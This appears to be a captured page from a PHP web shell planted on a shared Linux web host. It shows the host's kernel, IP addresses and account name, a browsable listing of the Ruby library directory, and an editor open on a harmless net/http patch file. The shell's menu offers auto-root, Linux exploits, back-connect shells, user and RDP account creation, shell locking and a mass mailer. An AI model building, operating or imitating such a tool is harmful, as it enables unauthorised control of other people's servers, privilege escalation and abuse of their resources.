Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
[ HOME SHELL ]
Name
Size
Permission
Action
3.0.0
[ DIR ]
drwxr-xr-x
action_dispatch
[ DIR ]
drwxr-xr-x
active_support
[ DIR ]
drwxr-xr-x
bootsnap
[ DIR ]
drwxr-xr-x
childprocess
[ DIR ]
drwxr-xr-x
coffee_script
[ DIR ]
drwxr-xr-x
columnize
[ DIR ]
drwxr-xr-x
domain_name
[ DIR ]
drwxr-xr-x
em
[ DIR ]
drwxr-xr-x
erubis
[ DIR ]
drwxr-xr-x
execjs
[ DIR ]
drwxr-xr-x
generators
[ DIR ]
drwxr-xr-x
hike
[ DIR ]
drwxr-xr-x
http
[ DIR ]
drwxr-xr-x
jbuilder
[ DIR ]
drwxr-xr-x
json
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
method_source
[ DIR ]
drwxr-xr-x
moneta
[ DIR ]
drwxr-xr-x
multi_json
[ DIR ]
drwxr-xr-x
mysql2
[ DIR ]
drwxr-xr-x
net
[ DIR ]
drwxr-xr-x
openid
[ DIR ]
drwxr-xr-x
phusion_passenger
[ DIR ]
drwxr-xr-x
pkg-config
[ DIR ]
drwxr-xr-x
racc
[ DIR ]
drwxr-xr-x
rack
[ DIR ]
drwxr-xr-x
rails
[ DIR ]
drwxr-xr-x
rake
[ DIR ]
drwxr-xr-x
rb-inotify
[ DIR ]
drwxr-xr-x
rmagick
[ DIR ]
drwxr-xr-x
rubygems
[ DIR ]
drwxr-xr-x
rvg
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
selenium
[ DIR ]
drwxr-xr-x
spring
[ DIR ]
drwxr-xr-x
sprockets
[ DIR ]
drwxr-xr-x
sqlite3
[ DIR ]
drwxr-xr-x
tilt
[ DIR ]
drwxr-xr-x
uglifier
[ DIR ]
drwxr-xr-x
unf
[ DIR ]
drwxr-xr-x
unf_ext
[ DIR ]
drwxr-xr-x
uuidtools
[ DIR ]
drwxr-xr-x
webrobots
[ DIR ]
drwxr-xr-x
websocket
[ DIR ]
drwxr-xr-x
xmlrpc
[ DIR ]
drwxr-xr-x
xpath
[ DIR ]
drwxr-xr-x
RMagick.rb
100
B
-rw-r--r--
bootsnap.rb
3.94
KB
-rw-r--r--
childprocess.rb
4.84
KB
-rw-r--r--
coffee-script.rb
24
B
-rw-r--r--
coffee_script.rb
1.85
KB
-rw-r--r--
columnize.rb
4.59
KB
-rw-r--r--
domain_name.rb
7.33
KB
-rw-r--r--
erubis.rb
1.71
KB
-rw-r--r--
eventmachine.rb
60.52
KB
-rw-r--r--
execjs.rb
108
B
-rw-r--r--
hike.rb
263
B
-rw-r--r--
hmac-md5.rb
204
B
-rw-r--r--
hmac-rmd160.rb
213
B
-rw-r--r--
hmac-sha1.rb
207
B
-rw-r--r--
hmac-sha2.rb
529
B
-rw-r--r--
hmac.rb
2.86
KB
-rw-r--r--
http-cookie.rb
22
B
-rw-r--r--
jbuilder.rb
8.47
KB
-rw-r--r--
jeventmachine.rb
8.34
KB
-rw-r--r--
json.rb
19.3
KB
-rw-r--r--
mail.rb
1.87
KB
-rw-r--r--
method_source.rb
4.31
KB
-rw-r--r--
moneta.rb
6.92
KB
-rw-r--r--
multi_json.rb
4.15
KB
-rw-r--r--
mysql2.rb
2.84
KB
-rw-r--r--
net-telnet.rb
21
B
-rw-r--r--
net_http_hacked.rb
2.41
KB
-rw-r--r--
openid.rb
675
B
-rw-r--r--
phusion_passenger.rb
11.69
KB
-rw-r--r--
pkg-config.rb
16.38
KB
-rw-r--r--
racc.rb
137
B
-rw-r--r--
rack-proxy.rb
20
B
-rw-r--r--
rails-deprecated_sanitizer.rb
37
B
-rw-r--r--
rb-inotify.rb
461
B
-rw-r--r--
rmagick.rb
65
B
-rw-r--r--
rmagick_internal.rb
57.88
KB
-rw-r--r--
ruby-openid.rb
17
B
-rw-r--r--
ruby_hmac.rb
52
B
-rw-r--r--
rubygems.rb
36.48
KB
-rw-r--r--
sass-rails.rb
22
B
-rw-r--r--
selenium-webdriver.rb
848
B
-rw-r--r--
sprockets.rb
6.5
KB
-rw-r--r--
sqlite3.rb
361
B
-rw-r--r--
systemu.rb
8.47
KB
-rw-r--r--
tilt.rb
6.11
KB
-rw-r--r--
uglifier.rb
10.89
KB
-rw-r--r--
unf.rb
659
B
-rw-r--r--
unf_ext.rb
109
B
-rw-r--r--
uuidtools.rb
24.2
KB
-rw-r--r--
webrobots.rb
5.62
KB
-rw-r--r--
xmlrpc.rb
7.99
KB
-rw-r--r--
xpath.rb
271
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : net_http_hacked.rb
# We are hacking net/http to change semantics of streaming handling # from "block" semantics to regular "return" semnatics. # We need it to construct a streamable rack triplet: # # [status, headers, streamable_body] # # See http://github.com/aniero/rack-streaming-proxy # for alternative that uses additional process. # # BTW I don't like monkey patching either # but this is not real monkey patching. # I just added some methods and named them very uniquely # to avoid eventual conflicts. You're safe. Trust me. # # Also, in Ruby 1.9.2 you could use Fibers to avoid hacking net/http. require 'net/https' class Net::HTTP # Original #request with block semantics. # # def request(req, body = nil, &block) # unless started? # start { # req['connection'] ||= 'close' # return request(req, body, &block) # } # end # if proxy_user() # unless use_ssl? # req.proxy_basic_auth proxy_user(), proxy_pass() # end # end # # req.set_body_internal body # begin_transport req # req.exec @socket, @curr_http_version, edit_path(req.path) # begin # res = HTTPResponse.read_new(@socket) # end while res.kind_of?(HTTPContinue) # res.reading_body(@socket, req.response_body_permitted?) { # yield res if block_given? # } # end_transport req, res # # res # end def begin_request_hacked(req) begin_transport req req.exec @socket, @curr_http_version, edit_path(req.path) begin res = Net::HTTPResponse.read_new(@socket) end while res.kind_of?(Net::HTTPContinue) res.begin_reading_body_hacked(@socket, req.response_body_permitted?) @req_hacked, @res_hacked = req, res @res_hacked end def end_request_hacked @res_hacked.end_reading_body_hacked end_transport @req_hacked, @res_hacked @res_hacked end end class Net::HTTPResponse # Original #reading_body with block semantics # # def reading_body(sock, reqmethodallowbody) #:nodoc: internal use only # @socket = sock # @body_exist = reqmethodallowbody && self.class.body_permitted? # begin # yield # self.body # ensure to read body # ensure # @socket = nil # end # end def begin_reading_body_hacked(sock, reqmethodallowbody) @socket = sock @body_exist = reqmethodallowbody && self.class.body_permitted? end def end_reading_body_hacked self.body @socket = nil end end
Close